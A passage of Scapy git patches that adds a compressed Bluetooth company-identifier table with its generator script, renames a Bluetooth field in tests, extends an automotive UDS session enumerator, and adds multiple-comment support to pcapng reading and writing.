+&2*?CDvU`mxC5~h{-ulnif(^n&mr~mc0ssCDO8xnuSUM2O>TTwK`Fm$cOFH-8|PhOt-xSf)|ii&(vS^ +b~el-|~GMX3Tllqz4Jzs84V{mv~9KYz(8XvUKBZXPFX-@Fb+#5}LJayS}p49YiA6ku%;EX1(YE{h(QMD +Phpo~&lr56U1(@BqtXF*IVWh^3v3dE>e&!+xw9kMNKWgB3lYRt6lfCq8)#ni-*ysNSgq*LP5{3&Xm(> +HZ`0DXEs!@UK?QvRc>BFv&;XWbR*#B)kwXd603=oY}yajhr8Sfo$QFE@V8xNz2+y41}fEbRm4;l +erGv7GwS#L1$U5ij!zOP@+&85vy(IS+JQsP|j)V0kTznD+_J`?(xBEW7=I2NKAdnI^`35`$=Rk9WbGK +TTtav__kMjhfXiC%LaOAbmwVbj&jba85f%6kW&Xs^pTYL&Gd#ahc29^&BHBr20S!D!-^Z1)MmW>m>v_ +k6(jcTu1%>1F$sxZX{I1Hak7p#kBaT>Z|QSQz3NnDw9x +ye`(S_^N>{mC-wMiTl)vZe3q^18TE_WiQ3E-lr&S(c?VMm)M%3KSK +7#Rwp+Hd@5FAuH^Kv;iZ0}Hs=Pw`?d)$XNHhe69{`9_PrwtEJsC^ggm;xAAz#%jpvXA;MgWWs)s9~&n +@+T+fwRJ~?XBTT-aGt0AV=?t{E%)BoXe!b7j#CnBCf!XKBk+ZFs*UTz_D#U)VU&Mk?2w?dyXT?#c%1D +f}bF*zsAPfoPdnyQ8~MRScSMhPZO=(9S<{+4f2t$VeHH;w!jD9W?&WaL4-Yu%zG3|6a=;YN{{1x(pPt +Fdg;ZgCT=dB2ZWSTm~GoWDYnOgKfwuBy71=tfHV4wAatjBH0L1!G5#0FGLqhxT+{fq6Pnx^U(7cN&Dt=H;qHi0YGcH{BeKxr@c(Jw6X6s&4A|Ym3gby8X;<{tN1MX!e~*JS(cV&O#^*&Y +{c8#>*uPXLVdjX6?E*b#hcmo0UYhg%IX>!&kCT?34wi-o$ZFxbh&dgNdXzXqZ-9+MmaB!t%1r)SpYOD +$)C{L@b*U#NX?gw9CKNSz>AW^Bm6Pfb7t!Un9(?;C}|geab=Xj*C$RnD5LQ|b-FIywa<^lcF9WOQ@*Gs=yXPy5@H$Aj`Yn +1pAWn1J`})!677uxDNgsun0Hfy-7B(4N$H7w9G+8#V*sb58{mqLDTN(~~4*x8woMa(xN!Nh^Z(N$w#< +N)7GP3^$57j@9qNi9_-!)4i=``PgEVuS~@TbToUq#97^FK`PzNf@MB^3FqXQwu9p;b6^gDeBK7rfQOM +E9`x`2_u#XQrUTna*-+}E?K)`u5uPEFvmL+ycalfaZg>H)Gbz=|RCMeFz&fYLmQFhGoYSMzm<1xIayF +<)r#ktbOG|F#`#h}+7-tL +6{Wb7WyF=APK@{@%?+M-@_j&0nf$o^Nl-&^|#J_yWQ7{1jxa?*1pg8<)?uz&9^bq80Wghb}6W&sGzo;&HBL8g +!JN4!bV&x&Nw#x0WKMqW#pmL*JwtQJoD#yV*iciBHrVa(j%6Gg2O&-;=C$t4x*$MP2D?<57h1j1yb|^cZ%}hWl) +@HJ+YB)qz4L;i52iztPjJm{ktt){YG8s*sl_K(Y2JL8<6b}G`E9re_z;UBFLj3?AHkBl7rJq*Uu5dPH +q>G|p7RIvs0gj%L~jKjWJ`9hZfn^9uK=D5NRFaX8*TgE7}3N-&8F=nif^MkR|^~r%8ATg(|RjJWA^B3 +H~z?ttD^f;a5yc>HKe%1ooQPfz*NrF=5b;qfJ!+D1~G>h2>5FMP7m8rZn3UGBjdIB!T;o>vZP>iKiwO +83@DLm1)^zo-opnaGE`dvwW7Kwz9OqYrRND1*JJMj7gG1dty`G!=7QM(Rx>{}fp;Jwm6!4qAH=?O3Fr +@{DeUa3AVLQDrj{PZ|Np-R8L}9wRjo?{jsE~%nN!^z7nsQ2hsTcp4mxB)MWSRXJ0r%X@9ll`OL>Om5C%WJ_`wVAlNq|6+ +w0cnOQTtNF>Mk=U_nCr%dT8(@Fw!5$fSb+(&wP>tX8grivlpv$K6t@r_*(ZL4KUj+p8Xy`Z?!Tp!Y0G +`);!#JJoAl)@r2%_;F07bWWWdz>huFtI$>LeE1S#wfocP0I-iku@2wbHUql*xJblx@c!si;^NPi!v+v +!??ca{^u|+4szaRPwq6pLkki5`vIqas+}vZh;5XSv1()u!?S7*>$x(f*?5SrnkDz}+d4&AXG%YlL;z) +$P6VV0ZahilP=Tad=ulzWvevDj{->LJppA6D9mF}hs(Pnjr`Ykathz(!0Vi=KVCyZ{s@{`3Ss4>uNn$ +`x#HZQG|cB^4iw|~_6uG5lh03Ip1uu-Ou=tk&3den_JtXu8e2QMeF@@j(Kc=nSI`Y8K4o(v%yyUN-R` +z;v-lUxSsQCEvb-}%T_b*kMLFa22IYpzkLny;n(G%LiXa$WPkd1V!^Gs##^XF<>0Sg=}W1!LY2wbK2O0;4}u*Nz55*KpNFvu%fp=e6M%UKpVx5 +;@XJT1J`I)pBLf%OjjG7O>Dn~&|$XD8bpgbaox_+1GJ-tkv3^Kn-Xl+0n{3+x +dclv90r$-ExT?(c$N(kupO@hguMCsIox6$P@P2#{l}*2wL2D0BV|=*O*uGN(ZYZ=N+<#1HZG9V;6c$B +@Il2>{(qo-^C*Nw8<+Mf1jmC_as|-YN-@7(*Ggoa&rR3hPM(RaLC0sh8h}&**wp;_;J}`&p5(z%;x{#UATLhp-_q +7VfV+5G5O(0C{{*;2HOp2sr9XJ1lq?c`3dIw7tt`bq)Y4<~sDLXT-VP0^3`E6;;wY#JPnie@W!UsY%9 +$KM743H0G_E#RQypgb$mCyVJOX)ri-1F>w)|Hyaogy=L3bDa_m%gUjC*fo4j;HcXt=G%6y +=Loxb-(!QqxH@}VO)q@RLWgO9CJ$M7uA2R9n+C*Y7L1tJCDcM1?MwpK7Lbo@7xb4jEny5EJo@T8m@||Ktj;m#pSy&P&sPH*SzKY%PDU>-|1 +eDTTi!|tnYCoInGH~wq)@LBFtQP50#rm&i3o|kyW{laCjxV@~`#oOVSHm_fDV +#(_R4sGFfDG8mHeDbl@aaf%v&n7W&&Cx4cLxx`Kfc#d|4;r4Zu2jR2xWE6znYjv(Qd8dlSVSX%&d9MC +%83z5WY{nV%uB$g59Fywi*+#i9JE%VWiX9_Kr2h-Q-?7hvCTx_T8Q;p*V +qlRtpxwb0!E$+611C%%_g_^I)rYuN{juvY?Feq>2l$#fIdBNZET&g!tc)!w(11m%%I#34pVi?)t2>=o +&!6F=wBQLyP%;uqsREK8sV%`+aI1}pzt^Mj}PrDq!N1UsLP`&?J<=f6AHqK|s*w&+3bi<8-mn#3rJQ} +vhb(-~2^JeUWyfI~ThnCuA`zm=#EwpCbZz`%WU8Q{b6RfgIJ@EtNvud|au+gvv8!@iyT)B66kZgDNit +41)1w_M;Zw!cZW^;ET&6nn1ma-faxx-CE)2HE}<-Yx)!@}oApO+temelkE0r +Cipg5***5hx4~63;*NcrI|jaN09e#o(j%iabNLZavth|`es6_Te&s+x3JD-S!~kt^aM81QDc{8@34-q +Zj5T|cBWax?z!t$N!mP^PG-Gm49?*>Fb;r+H8p>`Xm|I*Kbw-=!@q(>uP!Y`60kQutVi@$MQImT-~>R +!k=!kv9wlH5)r26I+tHY~m2!#4f5^pzkye1s?A)UN#IwSwsLsvx-!KEhc=6)VL^j%8 +#m-nXEQWSl7i@e=+5YYNV&yIP1h +MvtkrLKi}r`#79Lz;ag`(hpkTliDCZ4ob7R3ep{YvS+=8Zt4c;vC{=7or(-u&cJxS&f{Ju@tK^6C7Ca +H2@UKWRKghDZdd}x+Pd+O>h~em%RTIdhAwwA3Ef0xsXsgth7yHe;$!v!a+rVCUOM4-l@%k&A|6myFoJ +Sl`<_8v29F(Pp~A&*?+3Dv&!cnlbw119FqpeaGXSwXgWw1Vd#d?05J?c4BWaN_sXu^YA+JXDh+O_{oV +tvLkItE7Aix`V~26xBC#OYwDx{P-POQCL)hD(aib455Di|%mb$vNmTCsG<}}M{41)7|=G+FZCZ)O;s@ +mi(7S|#&|@<{oOJJ!h +`{R0Av+0}krtF{Uzri6g!<-h>53kH0sNhno7*j|rb*5f-n9vjkhD9m8KqXO8{lGUhyw +Rv@{d0P?=!_OH!4jfMa8eIpKsaDA6K9T>DWrI#fJ<@%&U%iIchI3&9{xRO;*(_-2QFmd`Aqgo2y3OwF +1Ep%)H)Z`1%+@7^z)_HnV=wzfZ1kOYgxEOGPFG2{krK%RMw;_#g}z={=E+V8Wj#j{8Q%bDda7gv>mw^ +O+-yl`KgkxsE@#-S((k`Rp=F^o%8=W3%)*Q9LZz6rxYPj4>X)H1PiWhOpZy}6z!%VWD68mntwpOoA|k +~+=PN~gWvW2zY`y=EMs8rtA?VeGPB5Fc|O;ZJ%RO`lw*IjfzsS8g=wUt$&P7lbS76A<1Xx8J?6QpQpG +r>zvZZgf*MU5v{U-+9`9^n--`ed8vm{j_OkMvQEIF;Smv&Bdli<8Rz{u~#;^+e^W%Am{7GQG5HEi1T% +|Mtk?QDAw+~%I?6ZpPZ(fO~2!chrhkLy4HuW{`2BRqJ)-jVYlpH>Yckm=IlU?lufOt9v*MlE@S4hLX+ +m>3wcVphX>s9lXVVN+dt+uqzDa>Y?Xqs^Vzmt&$GJvmr5Mtv7MB>pdYjnPJ0U*_+%)=dm&oI68iTaCP +WETTPCO38{Hy-#IqY#;w&pxUGe7jmNe;0=&n;2?K@Fob_bI=;Wb(rCoZ7dtf~AbUTu`$_50KTMD;Z#B +6ZoWn+!4CCX@)_Xu6Ic^v_0G*<46|*d!e^2o6=fB+tb4E<5o=Uc+}HI}HbN1DSYntO8S(vR-MMyNR^m +_qzKMJML`L7AgJJ$R>ef)oEW7UJEAgPxvy<7KL;)rKMp`O<=Z5C@5Sn5rhBbT;X+KFF)AET +x!%&z%{OjSC^R-&=Wl-2Zq{~yy9_<+LQ0RR +""") diff --git a/scapy/tools/generate_bluetooth.py b/scapy/tools/generate_bluetooth.py new file mode 100644 index 00000000000..9d534a0197c --- /dev/null +++ b/scapy/tools/generate_bluetooth.py @@ -0,0 +1,41 @@ +# SPDX-License-Identifier: GPL-2.0-or-later +# This file is part of Scapy +# See https://scapy.net/ for more information +# Copyright (C) Gabriel Potter + +""" +Generate the bluetoothids.py file based on blueooth_sig's public listing +""" + +import yaml +import json +import gzip +import urllib.request + +from base64 import b85encode + +URL = "https://bitbucket.org/bluetooth-SIG/public/raw/main/assigned_numbers/company_identifiers/company_identifiers.yaml" # noqa: E501 + +with urllib.request.urlopen(URL) as stream: + DATA = yaml.safe_load(stream.read()) + +COMPILED = {} + +for company in DATA["company_identifiers"]: + COMPILED[company["value"]] = company["name"] + +# Compress properly +COMPILED = gzip.compress(json.dumps(COMPILED).encode()) +# Encode in Base85 +COMPILED = b85encode(COMPILED).decode() +# Split +COMPILED = "\n".join(COMPILED[i : i + 79] for i in range(0, len(COMPILED), 79)) + "\n" + + +with open("../libs/bluetoothids.py", "r") as inp: + data = inp.read() + +with open("../libs/bluetoothids.py", "w") as out: + ini, sep, _ = data.partition("DATA = _d(\"\"\"") + COMPILED = ini + sep + "\n" + COMPILED + "\"\"\")\n" + print("Written: %s" % out.write(COMPILED)) diff --git a/test/scapy/layers/bluetooth.uts b/test/scapy/layers/bluetooth.uts index e359445c855..9df33f0126b 100644 --- a/test/scapy/layers/bluetooth.uts +++ b/test/scapy/layers/bluetooth.uts @@ -538,7 +538,8 @@ scan_resp_raw_data = \ scapy_packet = HCI_Hdr(scan_resp_raw_data) assert raw(scapy_packet[EIR_Manufacturer_Specific_Data].payload) == b'\x00_B31147D2461\xfc\x00\x03\x0c\x00\x00' -assert scapy_packet[EIR_Manufacturer_Specific_Data].company_id == 0x154 +assert scapy_packet[EIR_Manufacturer_Specific_Data].company_identifier == 0x154 +assert scapy_packet[EIR_Manufacturer_Specific_Data].sprintf("%company_identifier%") == "Pebble Technology" = Parse EIR_Manufacturer_Specific_Data with magic @@ -567,13 +568,13 @@ EIR_Manufacturer_Specific_Data.register_magic_payload(ScapyManufacturerPacket2) p = EIR_Hdr(b'\x0b\xff\xff\xffSCAPY!\xab\x12') p.show() -assert p[EIR_Manufacturer_Specific_Data].company_id == 0xffff +assert p[EIR_Manufacturer_Specific_Data].company_identifier == 0xffff assert p[ScapyManufacturerPacket].x == 0xab12 p = EIR_Hdr(b'\x0b\xff\xff\xff!SCAPY\x12\x34') p.show() -assert p[EIR_Manufacturer_Specific_Data].company_id == 0xffff +assert p[EIR_Manufacturer_Specific_Data].company_identifier == 0xffff assert p[ScapyManufacturerPacket2].y == 0x1234 # Test encode @@ -709,7 +710,7 @@ b.show() assert b[HCI_Event_Hdr].len > 0 assert b[EIR_CompleteLocalName].local_name == b"scapy" assert b[HCI_LE_Meta_Advertising_Report].addr == "a1:b2:c3:d4:e5:f6" -assert b[EIR_Manufacturer_Specific_Data].company_id == 0xffff +assert b[EIR_Manufacturer_Specific_Data].company_identifier == 0xffff assert raw(b[EIR_Manufacturer_Specific_Data].payload) == b"ypacs" assert b[EIR_TX_Power_Level].level == 10 assert b[EIR_CompleteList128BitServiceUUIDs].svc_uuids[0] == UUID("01234567-89ab-cdef-1023-456789abcdfe") @@ -746,7 +747,7 @@ a = HCI_Hdr()/HCI_Event_Hdr()/HCI_Event_LE_Meta()/HCI_LE_Meta_Extended_Advertisi rssi = -85, data=[ EIR_Hdr()/EIR_Manufacturer_Specific_Data( - company_id = 0xffff, + company_identifier = 0xffff, ) / Raw(b"scapy\x00\x01\x02\x03\x04") ] ), @@ -765,7 +766,7 @@ assert b[HCI_LE_Meta_Extended_Advertising_Report][0].data_length > 0 assert b[EIR_CompleteList16BitServiceUUIDs].svc_uuids == [0xffff] assert b[EIR_ServiceData16BitUUID].svc_uuid == 0xffff assert raw(b[EIR_ServiceData16BitUUID].payload) == b"scapy\x00\x00\x00" -assert b[EIR_Manufacturer_Specific_Data].company_id == 0xffff +assert b[EIR_Manufacturer_Specific_Data].company_identifier == 0xffff assert raw(b[EIR_Manufacturer_Specific_Data].payload) == b"scapy\x00\x01\x02\x03\x04" diff --git a/tox.ini b/tox.ini index d47bddf8b9d..c3a06ac726a 100644 --- a/tox.ini +++ b/tox.ini @@ -96,7 +96,7 @@ changedir = {toxinidir}/doc/scapy deps = sphinx cryptography commands = - sphinx-apidoc -f --no-toc -d 1 --separate --module-first --templatedir=_templates --output-dir api ../../scapy ../../scapy/modules/voip.py ../../scapy/modules/krack/ ../../scapy/libs/winpcapy.py ../../scapy/libs/ethertypes.py ../../scapy/libs/m*.py ../../scapy/libs/structures.py ../../scapy/libs/test_pyx.py ../../scapy/tools/ ../../scapy/arch/ ../../scapy/contrib/scada/* ../../scapy/layers/msrpce/raw/ ../../scapy/layers/msrpce/all.py ../../scapy/all.py ../../scapy/layers/all.py ../../scapy/compat.py + sphinx-apidoc -f --no-toc -d 1 --separate --module-first --templatedir=_templates --output-dir api ../../scapy ../../scapy/modules/voip.py ../../scapy/modules/krack/ ../../scapy/libs/winpcapy.py ../../scapy/libs/ethertypes.py ../../scapy/libs/bluetoothids.py ../../scapy/libs/m*.py ../../scapy/libs/structures.py ../../scapy/libs/test_pyx.py ../../scapy/tools/ ../../scapy/arch/ ../../scapy/contrib/scada/* ../../scapy/layers/msrpce/raw/ ../../scapy/layers/msrpce/all.py ../../scapy/all.py ../../scapy/layers/all.py ../../scapy/compat.py [testenv:mypy] @@ -136,7 +136,7 @@ description = "Check code for Grammar mistakes" skip_install = true deps = codespell # inet6, dhcp6 and the ipynb files contains french: ignore them -commands = codespell --ignore-words=.config/codespell_ignore.txt --skip="*.pyc,*.png,*.jpg,*.ods,*.raw,*.pdf,*.pcap,*.js,*.html,*.der,*_build*,*inet6.py,*dhcp6.py,*manuf.py,*tcpros.py,*.ipynb,*.svg,*.gif,*.obs,*.gz" scapy/ doc/ test/ .github/ +commands = codespell --ignore-words=.config/codespell_ignore.txt --skip="*.pyc,*.png,*.jpg,*.ods,*.raw,*.pdf,*.pcap,*.js,*.html,*.der,*_build*,*inet6.py,*dhcp6.py,*manuf.py,*tcpros.py,*bluetoothids.py,*.ipynb,*.svg,*.gif,*.obs,*.gz" scapy/ doc/ test/ .github/ [testenv:twine] From 7aea5cf193f93b8bfa99917eb687321a6e5d7d90 Mon Sep 17 00:00:00 2001 From: Nils Weiss Date: Wed, 3 Sep 2025 18:53:00 +0200 Subject: [PATCH 1539/1632] Add additional argument for UDS_DSCEnumerator (#4826) --- scapy/contrib/automotive/uds_scan.py | 39 ++++++++++++++++++++++++---- 1 file changed, 34 insertions(+), 5 deletions(-) diff --git a/scapy/contrib/automotive/uds_scan.py b/scapy/contrib/automotive/uds_scan.py index f30b9643ccb..6271b051868 100644 --- a/scapy/contrib/automotive/uds_scan.py +++ b/scapy/contrib/automotive/uds_scan.py @@ -41,7 +41,7 @@ _SocketUnion, _TransitionTuple, StateGenerator from scapy.contrib.automotive.uds import UDS, UDS_NR, UDS_DSC, UDS_TP, \ UDS_RDBI, UDS_WDBI, UDS_SA, UDS_RC, UDS_IOCBI, UDS_RMBA, UDS_ER, \ - UDS_TesterPresentSender, UDS_CC, UDS_RDBPI, UDS_RD, UDS_TD + UDS_TesterPresentSender, UDS_CC, UDS_RDBPI, UDS_RD, UDS_TD, UDS_DSCPR # TODO: Refactor this import from scapy.contrib.automotive.uds_ecu_states import * # noqa: F401, F403 from scapy.error import Scapy_Exception @@ -89,7 +89,8 @@ class UDS_DSCEnumerator(UDS_Enumerator, StateGeneratingServiceEnumerator): _supported_kwargs.update({ 'delay_state_change': (int, lambda x: x >= 0), 'overwrite_timeout': (bool, None), - 'close_socket_when_entering_session_2': (bool, None) + 'close_socket_when_entering_session_2': (bool, None), + 'support_suppress_positive_response': (bool, None) }) _supported_kwargs["scan_range"] = ( (list, tuple, range), lambda x: max(x) < 0x100 and min(x) >= 0) @@ -113,7 +114,13 @@ class UDS_DSCEnumerator(UDS_Enumerator, StateGeneratingServiceEnumerator): This enumerator will close the socket if session 2 (ProgrammingSession) was entered, if True. This will - force a reconnect by the executor.""" + force a reconnect by the executor. + :param bool support_suppress_positive_response: False by default. + If True, this enumerator will treat + no response for a DSC request with a + session type > 0x80 as a positive + response and will therefore create a + new state with a session value - 0x80.""" def _get_initial_requests(self, **kwargs): # type: (Any) -> Iterable[Packet] @@ -172,6 +179,29 @@ def get_new_edge(self, except KeyError: close_socket = False + try: + support_out_of_spec = config[UDS_DSCEnumerator.__name__]["support_suppress_positive_response"] # noqa: E501 + except KeyError: + support_out_of_spec = False + + if edge is None: + try: + state, req, resp, _, _ = cast(ServiceEnumerator, self).results[-1] # noqa: E501 + except IndexError: + return None + + if support_out_of_spec and resp is None and req.diagnosticSessionType > 0x80: # noqa: E501 + resp = UDS() / UDS_DSCPR(diagnosticSessionType=0x80 - req.diagnosticSessionType) # noqa: E501 + new_state = EcuState.get_modified_ecu_state(resp, req, state) + if new_state == state: + return None + else: + edge = (state, new_state) + self._edge_requests[edge] = req + return edge + else: + return None + if edge: state, new_state = edge # Force TesterPresent if session is changed @@ -1210,8 +1240,7 @@ def _random_memory_addr_pkt(addr_len=None): # noqa: E501 pkt.memorySizeLen = random.randint(1, 4) pkt.memoryAddressLen = addr_len or random.randint(1, 4) UDS_RMBARandomEnumerator.set_size(pkt, 0x10) - addr = random.randint(0, 2 ** (8 * pkt.memoryAddressLen) - 1) & \ - (0xffffffff << (4 * pkt.memoryAddressLen)) + addr = random.randint(0, 2 ** (8 * pkt.memoryAddressLen) - 1) & (0xffffffff << (4 * pkt.memoryAddressLen)) # noqa: E501 UDS_RMBARandomEnumerator.set_addr(pkt, addr) return pkt From d73bbc1d0736b9a3a1195882fe18a54852f43874 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?T=C3=BCrkalp=20Burak=20KAYRANCIO=C4=9ELU?= Date: Thu, 4 Sep 2025 14:23:19 +0300 Subject: [PATCH 1540/1632] Support Multiple Comments in Packet Object (#4798) * Rename 'comment' to 'comments' in Packet class and related classes for consistency * Add support for 'comment' parameter in GenericPcapWriter and RawPcapWriter classes for back compatibility * fix typo * Add test and support for 'comment' parameter for back compatibility * Refactor type annotations to comply with mypy type checking * Remove unnecessary code related to comments definition * Remove redundant fallback to comment for compatibility handling * add comment for option codes * Remove legacy 'comment' field when writing packet; use 'comments' instead * remove casting and update comment property to take first item of list * fix linting and typing issues * Reorder fields in PacketMetadata tuple for consistency and update unpacking in PcapNgReader * Apply formatting suggestion by guedou Co-authored-by: Guillaume Valadon --------- Co-authored-by: gpotter2 <10530980+gpotter2@users.noreply.github.com> Co-authored-by: Guillaume Valadon --- scapy/packet.py | 28 +++++++++++++--- scapy/utils.py | 80 +++++++++++++++++++++++++++------------------ test/regression.uts | 6 ++++ 3 files changed, 78 insertions(+), 36 deletions(-) diff --git a/scapy/packet.py b/scapy/packet.py index 8f17a104b00..3fb2eac6d92 100644 --- a/scapy/packet.py +++ b/scapy/packet.py @@ -101,7 +101,7 @@ class Packet( "direction", "sniffed_on", # handle snaplen Vs real length "wirelen", - "comment", + "comments", "process_information" ] name = None @@ -179,7 +179,7 @@ def __init__(self, self.wirelen = None # type: Optional[int] self.direction = None # type: Optional[int] self.sniffed_on = None # type: Optional[_GlobInterfaceType] - self.comment = None # type: Optional[bytes] + self.comments = None # type: Optional[List[bytes]] self.process_information = None # type: Optional[Dict[str, Any]] self.stop_dissection_after = stop_dissection_after if _pkt: @@ -223,6 +223,26 @@ def __init__(self, Optional[bytes], ] + @property + def comment(self): + # type: () -> Optional[bytes] + """Get the comment of the packet""" + if self.comments and len(self.comments): + return self.comments[0] + return None + + @comment.setter + def comment(self, value): + # type: (Optional[bytes]) -> None + """ + Set the comment of the packet. + If value is None, it will clear the comments. + """ + if value is not None: + self.comments = [value] + else: + self.comments = None + def __reduce__(self): # type: () -> Tuple[Type[Packet], Tuple[bytes], Packet._PickleType] """Used by pickling methods""" @@ -435,7 +455,7 @@ def copy(self) -> Self: clone.payload = self.payload.copy() clone.payload.add_underlayer(clone) clone.time = self.time - clone.comment = self.comment + clone.comments = self.comments clone.direction = self.direction clone.sniffed_on = self.sniffed_on return clone @@ -1145,7 +1165,7 @@ def clone_with(self, payload=None, **kargs): self.raw_packet_cache_fields ) pkt.wirelen = self.wirelen - pkt.comment = self.comment + pkt.comments = self.comments pkt.sniffed_on = self.sniffed_on pkt.direction = self.direction if payload is not None: diff --git a/scapy/utils.py b/scapy/utils.py index 320349243c6..e6a432e8477 100644 --- a/scapy/utils.py +++ b/scapy/utils.py @@ -1652,7 +1652,7 @@ class RawPcapNgReader(RawPcapReader): PacketMetadata = collections.namedtuple("PacketMetadataNg", # type: ignore ["linktype", "tsresol", "tshigh", "tslow", "wirelen", - "comment", "ifname", "direction", + "comments", "ifname", "direction", "process_information"]) def __init__(self, filename, fdesc=None, magic=None): # type: ignore @@ -1796,8 +1796,8 @@ def _read_packet(self, size=MTU): # type: ignore return res def _read_options(self, options): - # type: (bytes) -> Dict[int, bytes] - opts = dict() + # type: (bytes) -> Dict[int, Union[bytes, List[bytes]]] + opts = dict() # type: Dict[int, Union[bytes, List[bytes]]] while len(options) >= 4: try: code, length = struct.unpack(self.endian + "HH", options[:4]) @@ -1806,7 +1806,13 @@ def _read_options(self, options): "%d !" % len(options)) raise EOFError if code != 0 and 4 + length <= len(options): - opts[code] = options[4:4 + length] + # https://www.ietf.org/archive/id/draft-tuexen-opsawg-pcapng-05.html#name-options-format + if code in [1, 2988, 2989, 19372, 19373]: + if code not in opts: + opts[code] = [] + opts[code].append(options[4:4 + length]) # type: ignore + else: + opts[code] = options[4:4 + length] if code == 0: if length != 0: warning("PcapNg: invalid option " @@ -1825,6 +1831,12 @@ def _read_block_idb(self, block, _): options_raw = self._read_options(block[8:]) options = self.default_options.copy() # type: Dict[str, Any] for c, v in options_raw.items(): + if isinstance(v, list): + # Spec allows multiple occurrences (see + # https://www.ietf.org/archive/id/draft-tuexen-opsawg-pcapng-05.html#section-4.2-8.6) + # but does not define which to use. We take the first for + # backward compatibility. + v = v[0] if c == 9: length = len(v) if length == 1: @@ -1880,11 +1892,13 @@ def _read_block_epb(self, block, size): process_information = {} for code, value in options.items(): - if code in [0x8001, 0x8003]: # PCAPNG_EPB_PIB_INDEX, PCAPNG_EPB_E_PIB_INDEX + # PCAPNG_EPB_PIB_INDEX, PCAPNG_EPB_E_PIB_INDEX + if code in [0x8001, 0x8003]: try: - proc_index = struct.unpack(self.endian + "I", value)[0] + proc_index = struct.unpack( + self.endian + "I", value)[0] # type: ignore except struct.error: - warning("PcapNg: EPB invalid proc index" + warning("PcapNg: EPB invalid proc index " "(expected 4 bytes, got %d) !" % len(value)) raise EOFError if proc_index < len(self.process_information): @@ -1894,9 +1908,9 @@ def _read_block_epb(self, block, size): warning("PcapNg: EPB invalid process information index " "(%d/%d) !" % (proc_index, len(self.process_information))) - comment = options.get(1, None) + comments = options.get(1, None) epb_flags_raw = options.get(2, None) - if epb_flags_raw: + if epb_flags_raw and isinstance(epb_flags_raw, bytes): try: epb_flags, = struct.unpack(self.endian + "I", epb_flags_raw) except struct.error: @@ -1917,10 +1931,10 @@ def _read_block_epb(self, block, size): tshigh=tshigh, tslow=tslow, wirelen=wirelen, - comment=comment, ifname=ifname, direction=direction, - process_information=process_information)) + process_information=process_information, + comments=comments)) def _read_block_spb(self, block, size): # type: (bytes, int) -> Tuple[bytes, RawPcapNgReader.PacketMetadata] @@ -1944,10 +1958,10 @@ def _read_block_spb(self, block, size): tshigh=None, tslow=None, wirelen=wirelen, - comment=None, ifname=None, direction=None, - process_information={})) + process_information={}, + comments=None)) def _read_block_pkt(self, block, size): # type: (bytes, int) -> Tuple[bytes, RawPcapNgReader.PacketMetadata] @@ -1968,10 +1982,10 @@ def _read_block_pkt(self, block, size): tshigh=tshigh, tslow=tslow, wirelen=wirelen, - comment=None, ifname=None, direction=None, - process_information={})) + process_information={}, + comments=None)) def _read_block_dsb(self, block, size): # type: (bytes, int) -> None @@ -2043,10 +2057,11 @@ def _read_block_pib(self, block, _): options = self._read_options(block) for code, value in options.items(): if code == 2: - process_information["name"] = value.decode("ascii", "backslashreplace") + process_information["name"] = value.decode( # type: ignore + "ascii", "backslashreplace") elif code == 4: if len(value) == 16: - process_information["uuid"] = str(UUID(bytes=value)) + process_information["uuid"] = str(UUID(bytes=value)) # type: ignore else: warning("PcapNg: DPEB UUID length is invalid (%d)!", len(value)) @@ -2072,7 +2087,7 @@ def read_packet(self, size=MTU, **kwargs): rp = super(PcapNgReader, self)._read_packet(size=size) if rp is None: raise EOFError - s, (linktype, tsresol, tshigh, tslow, wirelen, comment, ifname, direction, process_information) = rp # noqa: E501 + s, (linktype, tsresol, tshigh, tslow, wirelen, comments, ifname, direction, process_information) = rp # noqa: E501 try: cls = conf.l2types.num2layer[linktype] # type: Type[Packet] p = cls(s, **kwargs) # type: Packet @@ -2088,7 +2103,7 @@ def read_packet(self, size=MTU, **kwargs): if tshigh is not None: p.time = EDecimal((tshigh << 32) + tslow) / tsresol p.wirelen = wirelen - p.comment = comment + p.comments = comments p.direction = direction p.process_information = process_information.copy() if ifname is not None: @@ -2114,9 +2129,9 @@ def _write_packet(self, usec=None, # type: Optional[int] caplen=None, # type: Optional[int] wirelen=None, # type: Optional[int] - comment=None, # type: Optional[bytes] ifname=None, # type: Optional[bytes] direction=None, # type: Optional[int] + comments=None, # type: Optional[List[bytes]] ): # type: (...) -> None raise NotImplementedError @@ -2197,7 +2212,7 @@ def write_packet(self, if wirelen is None: wirelen = caplen - comment = getattr(packet, "comment", None) + comments = getattr(packet, "comments", None) ifname = getattr(packet, "sniffed_on", None) direction = getattr(packet, "direction", None) if not isinstance(packet, bytes): @@ -2212,10 +2227,10 @@ def write_packet(self, rawpkt, sec=f_sec, usec=usec, caplen=caplen, wirelen=wirelen, - comment=comment, ifname=ifname, direction=direction, - linktype=linktype + linktype=linktype, + comments=comments, ) @@ -2367,9 +2382,9 @@ def _write_packet(self, usec=None, # type: Optional[int] caplen=None, # type: Optional[int] wirelen=None, # type: Optional[int] - comment=None, # type: Optional[bytes] ifname=None, # type: Optional[bytes] direction=None, # type: Optional[int] + comments=None, # type: Optional[List[bytes]] ): # type: (...) -> None """ @@ -2545,7 +2560,7 @@ def _write_block_epb(self, timestamp=None, # type: Optional[Union[EDecimal, float]] # noqa: E501 caplen=None, # type: Optional[int] orglen=None, # type: Optional[int] - comment=None, # type: Optional[bytes] + comments=None, # type: Optional[List[bytes]] flags=None, # type: Optional[int] ): # type: (...) -> None @@ -2580,11 +2595,12 @@ def _write_block_epb(self, # Options opts = b'' - if comment is not None: - comment = bytes_encode(comment) - opts += struct.pack(self.endian + "HH", 1, len(comment)) - # Pad Option Value to 32 bits - opts += self._add_padding(comment) + if comments and len(comments): + for c in comments: + comment = bytes_encode(c) + opts += struct.pack(self.endian + "HH", 1, len(comment)) + # Pad Option Value to 32 bits + opts += self._add_padding(comment) if type(flags) == int: opts += struct.pack(self.endian + "HH", 2, 4) opts += struct.pack(self.endian + "I", flags) @@ -2601,9 +2617,9 @@ def _write_packet(self, # type: ignore usec=None, # type: Optional[int] caplen=None, # type: Optional[int] wirelen=None, # type: Optional[int] - comment=None, # type: Optional[bytes] ifname=None, # type: Optional[bytes] direction=None, # type: Optional[int] + comments=None, # type: Optional[List[bytes]] ): # type: (...) -> None """ @@ -2659,7 +2675,7 @@ def _write_packet(self, # type: ignore flags = None self._write_block_epb(packet, timestamp=sec, caplen=caplen, - orglen=wirelen, comment=comment, ifid=ifid, flags=flags) + orglen=wirelen, comments=comments, ifid=ifid, flags=flags) if self.sync: self.f.flush() diff --git a/test/regression.uts b/test/regression.uts index fd0fa61352c..0cd5b0e1479 100644 --- a/test/regression.uts 